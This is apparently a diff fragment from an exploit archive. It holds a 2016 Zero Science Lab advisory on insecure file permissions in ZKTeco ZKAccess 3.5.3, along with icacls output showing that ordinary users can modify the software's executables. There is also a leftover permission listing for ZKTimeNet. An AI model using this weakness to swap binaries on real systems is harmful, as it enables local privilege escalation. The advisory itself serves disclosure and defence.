BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.Update.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.ZKTime5DB.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R

View file

@ -0,0 +1,49 @@
ZKTeco ZKAccess Professional 3.5.3 Insecure File Permissions
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.5.3 (Build 0005)
Summary: ZKAccess 3.5 is a desktop software which is suitable
for small and medium businesses application. Compatible with
all ZKAccess standalone reader controllers, the software can
simultaneously manage access control and generate attendance
report. The brand new flat GUI design and humanized structure
of new ZKAccess 3.5 will make your daily management more pleasant
and convenient.
Desc: ZKAccess suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'M' flag (Modify) for 'Authenticated Users'
group.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5361
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php
18.07.2016
--
C:\ZKTeco>icacls ZKAccess3.5
ZKAccess3.5 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files